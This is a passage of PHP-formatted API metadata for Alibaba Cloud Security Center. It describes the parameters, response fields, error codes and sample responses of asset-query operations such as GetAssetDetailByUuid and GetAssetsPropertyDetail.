**app**: application.'."\n" .'- **internet**: external network node.', 'type' => 'string', 'example' => 'app', 'title' => ''], 'Port' => ['description' => 'The destination port number.', 'type' => 'string', 'example' => '8080', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'Namespace' => [ 'description' => 'The namespace.', 'type' => 'array', 'items' => [ 'description' => 'The namespace.', 'type' => 'object', 'properties' => [ 'Id' => ['description' => 'The namespace ID.', 'type' => 'string', 'example' => '1', 'title' => ''], 'Name' => ['description' => 'The namespace name.', 'type' => 'string', 'example' => 'default', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Retrieve network topology between container applications', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '100', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetAppNetwork'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeAppNetworkFromSnapshot', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"7D46EDB0-xxx\\",\\n \\"AppNetwork\\": {\\n \\"Node\\": [\\n {\\n \\"RiskLevel\\": \\"0\\",\\n \\"Id\\": \\"1274\\",\\n \\"NamespaceId\\": \\"1\\",\\n \\"ContainerIds\\": [\\n \\"10a6c3fbaaxxx\\"\\n ],\\n \\"Type\\": \\"app\\",\\n \\"Name\\": \\"console\\"\\n }\\n ],\\n \\"Edge\\": [\\n {\\n \\"Id\\": \\"3534\\",\\n \\"SrcNodeId\\": \\"101\\",\\n \\"SrcNodeType\\": \\"app\\",\\n \\"DstNodeId\\": \\"102\\",\\n \\"DstNodeType\\": \\"app\\",\\n \\"Port\\": \\"8080\\"\\n }\\n ],\\n \\"Namespace\\": [\\n {\\n \\"Id\\": \\"1\\",\\n \\"Name\\": \\"default\\"\\n }\\n ]\\n }\\n}","type":"json"}]', ], 'GetAssetDetailByUuid' => [ 'summary' => 'Queries the details and extended information of a server asset by UUID.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas36IOGX'], ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address of the request. You do not need to specify this parameter. The system automatically obtains this value.', 'type' => 'string', 'required' => false, 'example' => '120.245.XX.XX', 'title' => ''], ], [ 'name' => 'Uuid', 'in' => 'query', 'schema' => ['description' => 'The UUID of the asset that you want to query.'."\n" .'> Call the [DescribeCloudCenterInstances](~~DescribeCloudCenterInstances~~) operation to obtain this parameter.', 'type' => 'string', 'required' => true, 'example' => '9e6cad93-a379-46fd-a701-9bbf02f4****', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type for the request and response messages. Default value: **zh**. Valid values:'."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '4892B68B-47BC-5E56-B327-9C2ACC6C1C09', 'title' => ''], 'AssetDetail' => [ 'description' => 'The asset details.', 'type' => 'object', 'properties' => [ 'CpuInfo' => ['description' => 'The CPU details.', 'type' => 'string', 'example' => 'Intel(R) Xeon(R) Platinum 8163 CPU @ 2.50GHz', 'title' => ''], 'InternetIp' => ['description' => 'The public IP address of the server.', 'type' => 'string', 'example' => '120.47.XX.XX', 'title' => ''], 'OsDetail' => ['description' => 'The operating system version and architecture of the server.', 'type' => 'string', 'example' => 'Linux 64bit', 'title' => ''], 'CreateTime' => ['description' => 'The timestamp when Security Center recorded the asset information, in milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1603863599000', 'title' => ''], 'Kernel' => ['description' => 'The kernel version of the operating system.', 'type' => 'string', 'example' => '4.18.0-80.11.2.el8_0.x86_64', 'title' => ''], 'Bind' => ['description' => 'Indicates whether the asset is bound to an authorization. Valid values:'."\n" ."\n" .'- **true**: The asset is bound to an authorization.'."\n" .'- **false**: The asset is not bound to an authorization.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'OsName' => ['description' => 'The operating system name of the server.', 'type' => 'string', 'example' => 'CentOS 7.4 64bit', 'title' => ''], 'Tag' => ['description' => 'The tag of the server.', 'type' => 'string', 'example' => 'InternetIp', 'title' => ''], 'ClientStatus' => ['description' => 'The status of the Security Center agent. Valid values: '."\n" .'- **pause**: Protection paused.'."\n" .'- **online**: Protected.'."\n" .'- **offline**: Not protected.', 'type' => 'string', 'example' => 'online', 'title' => ''], 'Mem' => ['description' => 'The memory size, in GB.', 'type' => 'integer', 'format' => 'int32', 'example' => '16', 'title' => ''], 'Memory' => ['description' => 'The memory size, in MB.', 'type' => 'integer', 'format' => 'int64', 'example' => '16384', 'title' => ''], 'VpcInstanceId' => ['description' => 'The instance ID of the VPC-connected instance where the server resides.', 'type' => 'string', 'example' => 'vpc-bp1fs3bwonlfq503w****', 'title' => ''], 'AuthVersion' => ['description' => 'The authorization version of the asset. Valid values:'."\n" ."\n" .'- **1**: Free Edition (unauthorized).'."\n" .'- **6**: Anti-virus Edition.'."\n" .'- **5**: Advanced Edition.'."\n" .'- **3**: Enterprise Edition.'."\n" .'- **7**: Ultimate Edition.', 'type' => 'integer', 'format' => 'int32', 'example' => '7', 'title' => ''], 'InstanceName' => ['description' => 'The name of the server.', 'type' => 'string', 'example' => 'i-fasdfasdfadfafa****', 'title' => ''], 'Region' => ['description' => 'The region where the server resides.', 'type' => 'string', 'example' => 'cn-shanghai', 'title' => ''], 'GroupTrace' => ['description' => 'The group to which the server belongs. Servers that are not assigned to a group belong to the **Ungrouped** group by default.', 'type' => 'string', 'example' => 'default', 'title' => ''], 'Ip' => ['description' => 'The IP address assigned by ECS.', 'type' => 'string', 'example' => '120.47.XX.XX', 'title' => ''], 'HostName' => ['description' => 'The hostname.', 'type' => 'string', 'example' => 'qewrqwerqs****', 'title' => ''], 'Os' => ['description' => 'The operating system type of the server.', 'type' => 'string', 'example' => 'linux', 'title' => ''], 'AuthModifyTime' => ['description' => 'The timestamp when the asset authorization was bound, in milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1627974044000', 'title' => ''], 'InstanceId' => ['description' => 'The ID of the server.', 'type' => 'string', 'example' => 'i-uf6h7p2fgk6rkk0g****', 'title' => ''], 'IntranetIp' => ['description' => 'The private IP address of the server.', 'type' => 'string', 'example' => '192.168.XX.XX', 'title' => ''], 'AssetType' => ['description' => 'The asset type. Valid values: '."\n" .'- **0**: Elastic Compute Service (ECS) server.'."\n" .'- **1**: Server Load Balancer (SLB).'."\n" .'- **2**: NAT gateway.'."\n" .'- **3**: ApsaraDB RDS database.'."\n" .'- **4**: ApsaraDB for MongoDB database.'."\n" .'- **5**: ApsaraDB for Redis database.'."\n" .'- **6**: container image.'."\n" .'- **7**: container.', 'type' => 'string', 'example' => '0', 'title' => ''], 'RegionId' => ['description' => 'The region ID of the asset.', 'type' => 'string', 'example' => 'cn-hanghzou', 'title' => ''], 'SysInfo' => ['description' => 'The operating system information of the server.', 'type' => 'string', 'example' => 'CentOS Linux 8.0.1905', 'title' => ''], 'Uuid' => ['description' => 'The UUID of the server.', 'type' => 'string', 'example' => '9e6cad93-a379-46fd-a701-9bbf02f4****', 'title' => ''], 'Cpu' => ['description' => 'The number of CPU cores.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'RegionName' => ['description' => 'The name of the region where the server resides.', 'type' => 'string', 'example' => 'China (Hohhot)', 'title' => ''], 'Flag' => ['description' => 'Indicates whether the asset is an Alibaba Cloud asset. Valid values:'."\n" ."\n" .'- **0**: Alibaba Cloud asset.'."\n" .'- **1**: Non-Alibaba Cloud asset.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'ClientVersion' => ['description' => 'The version of the Security Center agent.', 'type' => 'string', 'example' => '2.0.0', 'title' => ''], 'IpList' => [ 'description' => 'The list of IP addresses of the server.', 'type' => 'array', 'items' => ['description' => 'The list of IP addresses of the server.', 'type' => 'string', 'example' => '120.47.XX.XX', 'title' => ''], 'title' => '', 'example' => '', ], 'MacList' => [ 'description' => 'The MAC address.', 'type' => 'array', 'items' => ['description' => 'The MAC address.', 'type' => 'string', 'example' => '00:16:3*:1*:9*:cf', 'title' => ''], 'title' => '', 'example' => '', ], 'DiskInfoList' => [ 'description' => 'The list of disk information.', 'type' => 'array', 'items' => [ 'description' => 'The disk information.', 'type' => 'object', 'properties' => [ 'DiskName' => ['description' => 'The name of the disk.', 'type' => 'string', 'example' => '/dev/vda1', 'title' => ''], 'UseSizeByte' => ['description' => 'The used disk capacity, in bytes.', 'type' => 'integer', 'format' => 'int64', 'example' => '2998996992', 'title' => ''], 'TotalSize' => ['description' => 'The total disk capacity, in GB.', 'type' => 'integer', 'format' => 'int64', 'example' => '40', 'title' => ''], 'UseSize' => ['description' => 'The used disk capacity, in GB.', 'type' => 'integer', 'format' => 'int64', 'example' => '2', 'title' => ''], 'TotalSizeByte' => ['description' => 'The total disk capacity, in bytes.', 'type' => 'integer', 'format' => 'int64', 'example' => '42140479488', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'ClientSubStatus' => ['description' => 'The sub-status of the client on the instance. Valid values:'."\n" ."\n" .'- **online**: Online. The Security Center agent is **enabled**.'."\n" .'- **offline**: Offline. The Security Center agent is **disabled**.'."\n" .'- **pause**: Paused. The Security Center agent is in **protection paused** state.'."\n" .'- **uninstalled**: Not installed. The Security Center agent is **not installed**.'."\n" .'- **stopped**: Server shut down. The Security Center agent is in **server shut down** state.', 'type' => 'string', 'example' => 'online', 'title' => ''], 'VendorAuthAlias' => ['description' => 'The name of the account to which the AccessKey pair belongs.'."\n" .'> This parameter is returned only for third-party host assets. If the value is empty, this parameter is not returned.', 'type' => 'string', 'example' => 'test', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'no permission', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'Query server asset details and extended information', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '100', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetAssetDetailByUuid'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetAssetDetailByUuid', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"4892B68B-47BC-5E56-B327-9C2ACC6C1C09\\",\\n \\"AssetDetail\\": {\\n \\"CpuInfo\\": \\"Intel(R) Xeon(R) Platinum 8163 CPU @ 2.50GHz\\",\\n \\"InternetIp\\": \\"120.47.XX.XX\\",\\n \\"OsDetail\\": \\"Linux 64bit\\",\\n \\"CreateTime\\": 1603863599000,\\n \\"Kernel\\": \\"4.18.0-80.11.2.el8_0.x86_64\\",\\n \\"Bind\\": true,\\n \\"OsName\\": \\"CentOS 7.4 64bit\\",\\n \\"Tag\\": \\"InternetIp\\",\\n \\"ClientStatus\\": \\"online\\",\\n \\"Mem\\": 16,\\n \\"Memory\\": 16384,\\n \\"VpcInstanceId\\": \\"vpc-bp1fs3bwonlfq503w****\\",\\n \\"AuthVersion\\": 7,\\n \\"InstanceName\\": \\"i-fasdfasdfadfafa****\\",\\n \\"Region\\": \\"cn-shanghai\\",\\n \\"GroupTrace\\": \\"default\\",\\n \\"Ip\\": \\"120.47.XX.XX\\",\\n \\"HostName\\": \\"qewrqwerqs****\\",\\n \\"Os\\": \\"linux\\",\\n \\"AuthModifyTime\\": 1627974044000,\\n \\"InstanceId\\": \\"i-uf6h7p2fgk6rkk0g****\\",\\n \\"IntranetIp\\": \\"192.168.XX.XX\\",\\n \\"AssetType\\": \\"0\\",\\n \\"RegionId\\": \\"cn-hanghzou\\",\\n \\"SysInfo\\": \\"CentOS Linux 8.0.1905\\",\\n \\"Uuid\\": \\"9e6cad93-a379-46fd-a701-9bbf02f4****\\",\\n \\"Cpu\\": 2,\\n \\"RegionName\\": \\"China (Hohhot)\\",\\n \\"Flag\\": 0,\\n \\"ClientVersion\\": \\"2.0.0\\",\\n \\"IpList\\": [\\n \\"120.47.XX.XX\\"\\n ],\\n \\"MacList\\": [\\n \\"00:16:3*:1*:9*:cf\\"\\n ],\\n \\"DiskInfoList\\": [\\n {\\n \\"DiskName\\": \\"/dev/vda1\\",\\n \\"UseSizeByte\\": 2998996992,\\n \\"TotalSize\\": 40,\\n \\"UseSize\\": 2,\\n \\"TotalSizeByte\\": 42140479488\\n }\\n ],\\n \\"ClientSubStatus\\": \\"online\\",\\n \\"VendorAuthAlias\\": \\"test\\"\\n }\\n}","type":"json"}]', ], 'GetAssetSelectionConfig' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '167774', 'abilityTreeNodes' => ['FEATUREsasK0Q1Y8'], ], 'parameters' => [ [ 'name' => 'BusinessType', 'in' => 'query', 'schema' => ['description' => 'The business type of the asset selection. Valid values:'."\n" ."\n" .'- **VIRUS\\_SCAN\\_CYCLE\\_CONFIG**: trojan scan configuration'."\n" .'- **VIRUS\\_SCAN\\_ONCE\\_TASK**: trojan scan one-time scan'."\n" .'- **AGENTLESS_MALICIOUS_WHITE_LIST_[ID]**: agentless detection alert whitelisting rule'."\n" .'- **AGENTLESS_VUL_WHITE_LIST_[ID]**: agentless detection vulnerability whitelisting rule'."\n" .'- **FILE_PROTECT_RULE_SWITCH_TYPE_[ID]**: core file protection.', 'type' => 'string', 'required' => true, 'example' => 'VIRUS_SCAN_CYCLE_CONFIG', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The response body.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. It is a unique identifier generated by Alibaba Cloud for the request and can be used to troubleshoot issues.', 'type' => 'string', 'example' => 'C5936B67-3EDF-53ED-A542-02543972449A', 'title' => ''], 'Data' => [ 'description' => 'The data details.', 'type' => 'object', 'properties' => [ 'TargetType' => ['description' => 'The target asset type. Valid values:'."\n" ."\n" .'- **instance**: selected by server.'."\n" .'- **group**: selected by group.'."\n" .'- **vpc**: selected by VPC.', 'type' => 'string', 'example' => 'instance', 'title' => ''], 'SelectionKey' => ['description' => 'The unique identifier of the asset selection. You can use this identifier to query or modify the assets associated with this asset selection.', 'type' => 'string', 'example' => '657c8411-4e89-446c-ab66-d45d1331****', 'title' => ''], 'Platform' => ['description' => 'The operating system of the target asset. Valid values:'."\n" .'- **windows**: Windows operating system'."\n" .'- **linux**: Linux operating system.', 'type' => 'string', 'example' => 'linux', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'title' => 'Retrieve asset selection configuration', 'summary' => 'Retrieves the asset selection configuration.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetAssetSelectionConfig'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:GetAssetSelectionConfig', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'AssetSelectionConfig', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:assetselectionconfig/{#BusinessType}'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"C5936B67-3EDF-53ED-A542-02543972449A\\",\\n \\"Data\\": {\\n \\"TargetType\\": \\"instance\\",\\n \\"SelectionKey\\": \\"657c8411-4e89-446c-ab66-d45d1331****\\",\\n \\"Platform\\": \\"linux\\"\\n }\\n}","type":"json"}]', ], 'GetAssetsPropertyDetail' => [ 'summary' => 'Queries the details of Asset Fingerprints for startup items, kernel modules, or web sites.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas36IOGX'], ], 'parameters' => [ [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type of the request and response messages. Valid values:'."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'en', 'title' => ''], ], [ 'name' => 'Biz', 'in' => 'query', 'schema' => ['description' => 'The type of Asset Fingerprints to query. Default value: **sca**. Valid values:'."\n" ."\n" .'- **lkm**: kernel module'."\n" .'- **autorun**: startup item'."\n" .'- **web_server**: web site.', 'type' => 'string', 'required' => true, 'example' => 'lkm', 'title' => ''], ], [ 'name' => 'ItemName', 'in' => 'query', 'schema' => ['description' => 'The aggregation item name of the Asset Fingerprints to query.'."\n" .'> Call the [GetAssetsPropertyItem](~~GetAssetsPropertyItem~~) operation to obtain this parameter.', 'type' => 'string', 'required' => false, 'example' => 'virtio', 'title' => ''], ], [ 'name' => 'SearchCriteriaList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The collection of search criteria for querying Asset Fingerprints details.', 'type' => 'array', 'items' => [ 'description' => 'The details of a search criterion for querying Asset Fingerprints details.', 'type' => 'object', 'properties' => [ 'Name' => ['description' => 'The name of the search criterion. Valid values:'."\n" .'- **remarkItemName**: the aggregation item name of Asset Fingerprints. Fuzzy match is supported.'."\n" ."\n\n" .'>- - When **Biz** is set to **web_server**, **remarkItemName** indicates the domain name.'."\n" .'>- - When **Biz** is set to **lkm**, **remarkItemName** indicates the module name.'."\n" .'>- - When **Biz** is set to **autorun**, **remarkItemName** indicates the startup item path.', 'type' => 'string', 'required' => false, 'example' => 'remarkItemName', 'title' => ''], 'Value' => ['description' => 'The value of the search criterion.', 'type' => 'string', 'required' => false, 'example' => 'virtio', 'title' => ''], ], 'required' => false, 'title' => '', 'example' => '', ], 'required' => false, 'maxItems' => 20, 'title' => '', 'example' => '', ], ], [ 'name' => 'Remark', 'in' => 'query', 'schema' => ['description' => 'The server name or IP address.', 'type' => 'string', 'required' => false, 'example' => '1.2.XX.XX', 'title' => ''], ], [ 'name' => 'Uuid', 'in' => 'query', 'schema' => ['description' => 'The UUID of the asset to query.'."\n" .'> Call the [DescribeCloudCenterInstances](~~DescribeCloudCenterInstances~~) operation to obtain this parameter.', 'type' => 'string', 'required' => false, 'example' => '38f72ea4-4c9f-4df1-bc6c-0f267614****', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the page to return. Default value: **1**.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of entries per page for a paging query. Default value: 20. If you leave this parameter empty, 20 entries are returned per page by default.'."\n" .'> Do not leave PageSize empty.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], [ 'name' => 'UseNextToken', 'in' => 'query', 'schema' => ['description' => 'Specifies whether to use the NextToken method to retrieve the vulnerability list. If this parameter is used, TotalCount is no longer returned. Valid values:'."\n" ."\n" .'- **true**: Use the NextToken method.'."\n" .'- **false**: Do not use the NextToken method.', 'type' => 'boolean', 'required' => false, 'example' => 'true', 'title' => ''], ], [ 'name' => 'NextToken', 'in' => 'query', 'schema' => ['description' => 'The token that marks the starting position for the query. Leave this parameter empty to query from the beginning.'."\n" ."\n" .'> Do not specify this parameter for the first call. The response includes the NextToken value for the next call. Each subsequent response contains the NextToken value for the following call.', 'type' => 'string', 'required' => false, 'example' => '71640f04f6e7b49764c8d08ae170xxxx', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The response parameters.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '4C1AE3F3-18FA-4108-BBB9-AFA1A032****', 'title' => ''], 'PageInfo' => [ 'description' => 'The paging information displayed on the page.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page in a paging query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The number of Asset Fingerprints details displayed per page in a paging query.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of Asset Fingerprints detail entries returned.', 'type' => 'integer', 'format' => 'int32', 'example' => '23', 'title' => ''], 'Count' => ['description' => 'The number of Asset Fingerprints detail entries on the current page.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'NextToken' => ['description' => 'The NextToken value returned when the NextToken method is used.', 'type' => 'string', 'example' => 'AAAAAV3MpHK1AP0pfERHZN5pu6k+AtdhNE3kgQEK36GujZ5on+tWdc+4WoaoMP/kUNxxxx', 'title' => ''], ], 'title' => '', 'example' => '', ], 'Propertys' => [ 'description' => 'The collection of Asset Fingerprints details.', 'type' => 'array', 'items' => [ 'description' => 'The Asset Fingerprints detail.', 'type' => 'object', 'properties' => [ 'ModuleName' => ['title' => '', 'description' => 'The module name.'."\n" .'> This parameter is returned only when **Biz** is set to **lkm**.', 'type' => 'string', 'example' => 'alihids'], 'Size' => ['title' => '', 'description' => 'The size of the kernel module.'."\n" .'> This parameter is returned only when **Biz** is set to **lkm**.', 'type' => 'integer', 'format' => 'int32', 'example' => '10'], 'Filepath' => ['title' => '', 'description' => 'The file path of the kernel module.'."\n" .'> This parameter is returned only when **Biz** is set to **lkm**.', 'type' => 'string', 'example' => '/lib/modules/4****'], 'UsedByCount' => ['title' => '', 'description' => 'The number of dependencies on the kernel module.'."\n" .'> This parameter is returned only when **Biz** is set to **lkm**.', 'type' => 'integer', 'format' => 'int32', 'example' => '0'], 'Path' => ['title' => '', 'description' => 'The meaning of this parameter varies based on the value of **Biz**:'."\n" .'- When **Biz** is set to **web_server**, this parameter indicates the web root path.'."\n" .'- When **Biz** is set to **autorun**, this parameter indicates the startup item path.', 'type' => 'string', 'example' => '/lib/systemd/system****'], 'ServerType' => ['title' => '', 'description' => 'The type of the web site.'."\n" .'> This parameter is returned only when **Biz** is set to **web_server**.', 'type' => 'string', 'example' => 'nginx'], 'Port' => ['title' => '', 'description' => 'The port of the web site.'."\n" .'> This parameter is returned only when **Biz** is set to **web_server**.', 'type' => 'string', 'example' => '80'], 'Pid' => ['title' => '', 'description' => 'The PID of the web site process.'."\n" .'> This parameter is returned only when **Biz** is set to **web_server**.', 'type' => 'string', 'example' => '813'], 'ListenProtocol' => ['title' => '', 'description' => 'The listening protocol of the web site process.'."\n" .'> This parameter is returned only when **Biz** is set to **web_server**.', 'type' => 'string', 'example' => 'tcp'], 'ProcessStarted' => ['title' => '', 'description' => 'The timestamp when the web site process started, in milliseconds.'."\n" .'> This parameter is returned only when **Biz** is set to **web_server**.', 'type' => 'integer', 'format' => 'int64', 'example' => '1671186801000'], 'WebPath' => ['title' => '', 'description' => 'The web path of the web site.'."\n" .'> This parameter is returned only when **Biz** is set to **web_server**.', 'type' => 'string', 'example' => '/usr/share/nginx/html'], 'Domain' => ['title' => '', 'description' => 'The domain name of the web site.'."\n" .'> This parameter is returned only when **Biz** is set to **web_server**.', 'type' => 'string', 'example' => 'localhost'], 'User' => ['title' => '', 'description' => 'The user of the web site.'."\n" .'> This parameter is returned only when **Biz** is set to **web_server**.', 'type' => 'string', 'example' => 'root'], 'PathMode' => ['title' => '', 'description' => 'The directory permissions of the web site.'."\n" .'> This parameter is returned only when **Biz** is set to **web_server**.', 'type' => 'string', 'example' => '755'], 'InstanceId' => ['title' => '', 'description' => 'The instance ID of the server.', 'type' => 'string', 'example' => 'i-hp35tftuh52wbp1g****'], 'IntranetIp' => ['title' => '', 'description' => 'The private IP address of the server.', 'type' => 'string', 'example' => '100.104.XX.XX'], 'InternetIp' => ['title' => '', 'description' => 'The public IP address of the server.', 'type' => 'string', 'example' => '47.42.XX.XX'], 'Ip' => ['title' => '', 'description' => 'The IP address of the server.', 'type' => 'string', 'example' => '47.42.XX.XX'], 'Uuid' => ['title' => '', 'description' => 'The UUID of the server.', 'type' => 'string', 'example' => '162eb349-c2d9-4f8b-805c-75b43d4c****'], 'InstanceName' => ['title' => '', 'description' => 'The name of the server instance.', 'type' => 'string', 'example' => 'hc-host-****'], 'RegionId' => ['title' => '', 'description' => 'The region ID of the instance.', 'type' => 'string', 'example' => 'cn-hangzhou'], 'CreateTimestamp' => ['title' => '', 'description' => 'The timestamp of the latest Asset Fingerprints scan, in milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1649149566000'], 'ImageName' => ['title' => '', 'description' => 'The image name.', 'type' => 'string', 'example' => 'registry-vpc.cn-beijing.aliyuncs.com/acs/aliyun-ingress-controller****'], 'ContainerName' => ['title' => '', 'description' => 'The container name.', 'type' => 'string', 'example' => '5-rce_web_1'], 'ModelName' => ['description' => 'The name of the large language model provider.', 'type' => 'string', 'example' => '阿里云百炼', 'title' => ''], 'EndPoint' => ['description' => 'The endpoint address of the large language model service.', 'type' => 'string', 'example' => 'dashscope.aliyuncs.com', 'title' => ''], 'File' => ['description' => 'The file path for requesting the large language model service.', 'type' => 'string', 'example' => '/root/llm.py', 'title' => ''], 'MiddlewareName' => ['description' => 'The name of the AI tool.', 'type' => 'string', 'example' => 'vllm', 'title' => ''], 'MiddlewareVersion' => ['description' => 'The version of the AI tool.', 'type' => 'string', 'example' => '1.0.1', 'title' => ''], 'InstallationPath' => ['description' => 'The installation path of the AI tool.', 'type' => 'string', 'example' => '/etc/pip3/env/vllm', 'title' => ''], 'RepoName' => ['title' => '', 'description' => 'The RepoName of the image.', 'type' => 'string', 'example' => 'ACR-Example'], 'RepoNamespace' => ['title' => '', 'description' => 'The repo namespace of the image.', 'type' => 'string', 'example' => 'Default'], 'Tag' => ['title' => '', 'description' => 'The tag.', 'type' => 'string', 'example' => 'AI'], 'ImageDigest' => ['title' => '', 'description' => 'The digest of the image.', 'type' => 'string', 'example' => 'ImageDigest'], 'Agent' => ['description' => 'The agent.', 'type' => 'string', 'example' => 'Mozilla/5.0 (Windows NT 10.0%3B Win64%3B x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Edg/125.0.0.0', 'title' => ''], 'SkillsName' => ['description' => 'The skill name.', 'type' => 'string', 'example' => 'Analytics and Data Analysis', 'title' => ''], 'McpName' => ['description' => 'The MCP name.', 'type' => 'string', 'example' => '@modelcontextprotocol/server-github', 'title' => ''], 'Description' => ['description' => 'The asset description.', 'type' => 'string', 'example' => '{\'Type\': \'text\', \'Value\': u\'\\u786e\\u4fdd\\u7f51\\u5173\\u5b89\\u5168\\u9632\\u62a4\\u3002\\u8981\\u6c42\\uff1a\\u5f00\\u542fWAF\\u9632\\u706b\\u5899\\u9632\\u62a4\\u529f\\u80fd\\u3002\'}', 'title' => ''], 'TransportName' => ['description' => 'The transport name.', 'type' => 'string', 'example' => 'test', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'IllegalParam', 'errorMessage' => 'Illegal param', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query asset fingerprints detail list', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GetAssetsPropertyDetail'], ], 'product' => ['code' => 'sas', 'title' => 